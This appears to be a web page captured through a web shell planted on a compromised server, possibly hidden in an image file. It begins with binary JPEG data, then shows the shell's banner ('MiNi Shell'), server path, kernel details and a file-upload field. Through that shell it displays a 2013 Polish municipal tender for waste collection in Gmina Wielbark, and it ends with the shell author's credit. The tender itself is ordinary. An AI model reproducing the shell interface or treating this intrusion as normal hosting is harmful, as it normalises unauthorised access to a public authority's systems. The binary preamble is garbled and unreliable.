JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130204/46808-N-2013.html

<p class="kh_header"><b>Wielbark: Kompleksowe odbieranie i zagospodarowanie odpadów komunalnych od właścicieli 
        nieruchomości  zamieszkałych na terenie Gminy  Wielbark</b><br>
<b>Numer ogłoszenia: 46808 - 2013; data zamieszczenia: 04.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielbark , ul. Grunwaldzka 2, 12-160 Wielbark, woj. warmińsko-mazurskie, tel. 089 6218106, faks 089 6218106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielbark.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe odbieranie i zagospodarowanie odpadów komunalnych od właścicieli 
        nieruchomości  zamieszkałych na terenie Gminy  Wielbark.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowe odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości  zamieszkałych na terenie gminy Wielbark.  
Gmina Wielbark liczy: 6 726 mieszkańców ok. 1400 gospodarstw podzielonych na 22 sołectwa.  Zbiórka, wywóz i zagospodarowanie odpadów winno  odbywać  się zgodnie z wytycznymi Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Warmińsko -Mazurskiego na lata 2011- 2016 oraz przepisami prawa polskiego.
   Zamówienie obejmuje:
1. Zabudowa jednorodzinna i wielorodzinna.
Na terenie zabudowy jednorodzinnej  i wielorodzinnej obowiązywać będzie system mieszany (workowo - pojemnikowy) zbiórki odpadów komunalnych.
a) Zmieszane odpady komunalne.
Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki dostarcza Wykonawca w zależności od potrzeb mieszkańców i ustawi je w miejscach wskazanych przez właścicieli nieruchomości. Częstotliwość załadunku i wywozu - 1 raz na 2 tygodnie.
b) selektywnie zbierane odpady komunalne 
Selektywna zbiórka odpadów komunalnych będzie się odbywać w systemie workowym. Wprowadza się następujące  rodzaje worków:
- żółty - do gromadzenia odpadów z tworzyw sztucznych, 
- niebieski - do gromadzenia odpadów  z papieru i tektury, 
- zielony -  do gromadzenia odpadów ze szkła,
- przezroczysty - do gromadzenia odpadów z metali i opakowań wielomateriałowych.
Worki dostarcza Wykonawca w zależności od potrzeb mieszkańców
Częstotliwość załadunku i wywozu- 1 raz na 4 tygodnie, dla każdego rodzaju (koloru worka).
c) odpady wielkogabarytowe,  zużyty  sprzęt elektryczny i elektroniczny 
Odbiór odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego będzie się odbywać poprzez odbieranie wystawionych ww. odpadów przez właścicieli przed swoimi
nieruchomościami w ustalonych przez Zamawiającego z Wykonawcą terminach.
Częstotliwość załadunku i wywozu - co najmniej jeden raz na trzy miesiące od 1 marca do 30 listopada.
W okresie między wystawkami mieszkańcy będą mogli własnym transportem dowieźć odpady do punktu selektywnego zbierania odpadów komunalnych. 
d) odpady niebezpieczne  typu;
- leki odbierane będą w punktach aptecznych  i zakładach opieki zdrowotnej,  
- baterie odbierane będą w punktach stacjonarnych (wykaz punktów zostanie przekazany Wykonawcy). Pojemniki na zużyte baterie, zaopatrzone w małe otwory wrzutowe, dostarczy Wykonawca w ilości 4 sztuk. Częstotliwość załadunku i wywozu - za każdym razem - co najmniej 1 raz na 3 miesiące. 
2. Opróżnianie koszy ulicznych. 
Wykonawca zobowiązany jest do codziennego  opróżniania koszy ulicznych zlokalizowanych  w miejscowości Wielbark.
3. Uprzątanie wiat przystankowych.
Wykonawca zobowiązany jest w każdy piątek do uprzątania  wiat przystankowych zlokalizowanych na terenie Gminy Wielbark oraz opróżniania  koszy.

4. Punkt selektywnego zbierania odpadów.
Wykonawca  w terminie do 30 marca 2013 r.  i  na własny koszt zorganizuje i uruchomi  centralny  punkt selektywnego zbierania odpadów  komunalnych w Wielbarku  z godzinami pracy od poniedziałku do soboty w godzinach od 7.00 do 15.00 .
Punkt powinien być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym. Miejsca magazynowania selektywnie zebranych odpadów komunalnych powinny być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniami czynników atmosferycznych. 
W punkcie  selektywnego zbierania odpadów komunalnych odbierane będą: 
a)  odpady komunalne ulegające biodegradacji, 
b) chemikalia,
c) zużyte baterie i akumulatory,
d) zużyte opony,
e) odpady remontowe i rozbiórkowe,
f) popiół.
g)  odpady wielkogabarytowe,
h)  zużyty sprzęt elektryczny i elektroniczny.

5.  Wykaz urządzeń do gromadzenia odpadów.
Do gromadzenia odpadów na terenie Gminy Wielbark służą:
a) kosze uliczne o pojemności  35 l do 60 l
b) pojemniki:
-  120 l
-  1100 l
Do selektywnej zbiórki odpadów Wykonawca jest zobowiązany dostarczyć :
c) worki o minimalnej pojemności 35 litrów wykonane z folii polietylenowych o grubości dostosowanej do ilości odpadów, uniemożliwiającej rozerwanie się worka,  w kolorach:
- żółtym,
- niebieskim
- zielonym
- przezroczystym
Na workach umieszcza się w widocznym miejscu na tle, odpowiadającym kolorom dla danego rodzaju odpadów widoczny napis: 
1) SZKŁO - w przypadku worka na opady ze szkła
2) PAPIER - w przypadku worka na odpady z papieru i tektury
3) PLASTIK- w przypadku worka na odpady z tworzyw sztucznych
Wielkość pojemników i worków winna być dostosowana do potrzeb użytkownika.
    6.  Wykaz sprzętu technicznego.
Wykonawca musi posiadać sprzęt niezbędny do realizacji zamówienia, lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału w tym minimalne wymagania: 
1) W posiadaniu podmiotu odbierającego odpady komunalne powinny znajdować się, co   
    najmniej:
    - dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych  
     (śmieciarki),
    - dwa pojazdy przystosowane do odbierania  selektywnie zebranych odpadów komunalnych,
    - jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
3) Wymagania dla bazy magazynowo -  transportowej:
  - baza magazynowo - transportowa powinna być usytuowana w gminie, z terenu której odbiera te     
   odpady, lub w odległości nie większej niż 60 km od granicy tej gminy i na terenie, do którego  
    posiada tytuł prawny,
  - teren bazy transportowej powinien być zabezpieczony w sposób uniemożliwiający wstęp osobom    
   nieupoważnionym,
 - baza magazynowo- transportowa powinna być wyposażona w:
   a) miejsca przeznaczone do parkowania pojazdów,
   b) pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
   c) miejsca magazynowania selektywnie zebranych odpadów z grupy odpadów 
    komunalnych,
   d) legalizowaną wagę najazdową - w przypadku gdy na terenie bazy następuje 
        magazynowanie odpadów,
 - miejsca magazynowania selektywnie zebranych odpadów komunalnych powinny być  
    zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem 
     czynników atmosferycznych, 
  - na terenie bazy transportowej powinien znajdować się punkt bieżącej konserwacji i napraw 
    pojazdów, miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane 
    przez uprawnione podmioty zewnętrzne poza terenem bazy transportowej.         
  - teren bazy magazynowo - transportowej powinien być wyposażony w urządzenia lub 
    systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, 
    pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 
    18 lipca 2001r. Prawo wodne (Dz. U. z 2012r., poz. 145, 951, i  1513 oraz z 2013r. poz. 21).                                         
   7. Szczegółowe dane charakteryzujące zamówienie.
   Wykaz gospodarstw domowych , a tym samym miejsc gromadzenia odpadów.
Lp.
Miejscowość, ulica
Ilość gospodarstw domowych 
1.
Wielbark, ul. Śląska
3
2.
Wielbark, ul. Kętrzyńskiego
68
3. 
Wielbark, ul. Studzienna
18
4.
Wielbark, ul. Sprzymierzonych
9
5.
Wielbark, ul. Jagiełły
60
6.
Wielbark, ul. Mickiewicza
38
7. 
Wielbark, ul. 1 Maja
45
8
Wielbark, ul. 11 Listopada
30
9.
Wielbark, ul. F. Nowowiejskiego
55
10. 
Wielbark, ul. Kopernika
58
11.
Wielbark, ul. Czarnieckiego
50
12.
Wielbark, ul. Polna
30
13.
Wielbark, ul. Ogrodowa
9
14.
Wielbark, ul. Nad Sawicą
10
15.
Wielbark, ul. Kajki
27
16.
Wielbark, ul. Plac Wojciecha
5
17.
Wielbark, ul. Mazurska
17
18.
Wielbark, ul. Warmińska
1
19.
Wielbark, ul. Królowej Jadwigi
2
20.
Wielbark Wspólnoty mieszkaniowe 
123
21.
Wielbark, ul. Lipowa
9
22.
Wielbark, ul. Grunwaldzka
7
23.
Wielbark, ul. Chodkiewicza
20
24.
Wielbark Kolonie 
36
25.
Lejkowo
20
26.
Sędrowo 
12
27.
Lesiny Wielkie
30
28.
Zapadki
5
29.
Zieleniec
25
30.
Zabiele
28
31. 
Wesołowo
51
32.
Stachy
37
33.
Róklas
5
34.
Przeździęk Wielki
41
35.
Przeździęk Mały
15
36.
Ostrowy
7
37.
Nowojowiec
12
38.
Łysak
3
39.
Łatana Mała
10
40.
Łatana Wielka
15
41.
Lesiny Małe
10
42.
Maliniak
6
43. 
Olędry
10
44.
Piwnice Wielkie
32
45.
Szymanki
25
46.
Wesołówko
25
47.
Wyżegi
30
48.
Jankowo
3
49.
Ciemna Dąbrowa
25
50.
Borki Wielbarskie
13
51.
Głuch
15
52.
Kipary
15
53.
Jakubowy Borek
5
54.
Baranowo
43
55.
Jesionowiec
30
56.
Kołodziejowy Grąd
20
57. 
Kucbork
47
                                                       Razem
   1400

8. Harmonogram wywozu oraz orientacyjne długości tras przejazdowych


Ulica/ wieś
Poniedziałek
Wielbark : ul. Polna,  ul. Lipowa, ul.1 Maja, ul. Mickiewicza, ul. Leśna,                                 ul. Sprzymierzonych

miejscowości  wraz z zabudową kolonijną : Piwnice Wielkie, Wyżegi PGR,  Wyżegi,  
                  Baranowo, Przeździęk Mały, Przeździęk Wielki 
długość trasy: 50 km

Wtorek
Wielbark : ul. Jagiełły, ul. Ogrodowa, ul. Studzienna, ul. Kopernika,   ul. Grunwaldzka
miejscowości wraz z zabudową kolonijną: Szymanki, Kucbork, Głuch,  Wesołówek, 
                 Wesołowo
długość trasy: 112 km

Środa
Wielbark: ul. Nowowiejskiego, ul. Kajki,  ul. Dworcowa, ul. Nad Sawicą,                         ul. Czarnieckiego, ul. Kopernika

miejscowości wraz z zabudowa kolonijną : Ciemna Dąbrowa, Zabiele,  Jesionowiec, 
                  Kołodziejowy Grąd
długość trasy: 32 km

Czwartek
Wielbark: ul. 11-go Listopada, ul. Kopernika- główna, ul. Napoleońska,  ul. Królowej 
                 Jadwigi

miejscowości wraz z zabudową kolonijną: Stachy, Borki Wielbarskie, Lejkowo, Zieleniec, 
                  Lesiny Małe, Lesiny Wielkie, Łatana Mała,  Łatana Wielka, Kipary, Sędrowo
długość trasy: 58 km

Piątek
Wielbark: ul. Kętrzyńskiego, ul. Mazurska , 

Wielbark Kolonia I, Wielbark Kolonia II, 
                 Wielbark Kolonia III, Wielbark Kolonia IV, Wielbark Kolonia V.
długość trasy:  36 km

 Szczegółowy opis przedmiotu zamówienia zawarty jest w rozdziale 4 SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ).
Warunek ten zostanie spełniony, jeżeli wykonawcy również wykażą, że posiadają Wypis z rejestru działalności regulowanej gminy Wielbark dot. prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ)
Warunek ten zostanie spełniony, jeżeli wykonawcy również wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują cyklicznie przez okres co najmniej jednego roku jedno zadanie polegające na odbieraniu odpadów komunalnych od właścicieli nieruchomości o zbliżonym zakresie, jaki Zamawiający określił w pkt. 4 SIWZ (wykaz złożony na druku stanowiącym załącznik nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ).
Warunek ten zostanie spełniony, jeżeli wykonawcy również wykażą, że posiadają co najmniej:
- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych 
   (śmieciarki),
- dwa pojazdy przystosowane do odbierania  selektywnie zebranych odpadów komunalnych,
- jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
wykaz złożony na druku stanowiącym załącznik nr 5 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie spełniony, jeżeli wykonawcy złożą oświadczenie zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ).
Warunek ten zostanie spełniony, jeżeli wykonawcy także wykażą, że posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  300 000 tysięcy PLN. ( słownie: trzysta tysięcy PLN).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz oferty - załącznik Nr 1 do SIWZ
2.  Oświadczenie o braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust.1 
      ustawy Pzp. - załącznik Nr 3 do SIWZ.
    3. Wzór umowy - załącznik Nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wielbark-ug.bip-wm.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielbark
12-160 Wielbark ul. Grunwaldzka 2,  pok. nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2013 godzina 10:00, miejsce: Urząd Gminy Wielbark
12-160 Wielbark ul. Grunwaldzka 2, sekretariat pok. nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com